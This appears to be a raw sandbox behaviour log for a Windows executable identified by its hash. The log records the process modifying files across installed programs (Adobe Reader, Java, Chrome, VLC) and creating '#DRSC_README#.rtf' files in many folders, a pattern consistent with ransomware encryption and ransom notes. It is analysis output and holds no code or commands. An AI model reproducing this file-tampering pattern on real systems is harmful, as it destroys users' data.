710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\es-419_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ko.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\de.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\javafx-src.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\tool-view.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunpkcs11.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jhat.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_it.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured_lg.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\icudtl.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\classlist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\progress.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496939244.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_opencarat_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\fillandsign.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_pattern_RHP.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_HK.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\wsimport.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\acrobat_parcel_generic_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_link_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_24.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-right.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_move_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 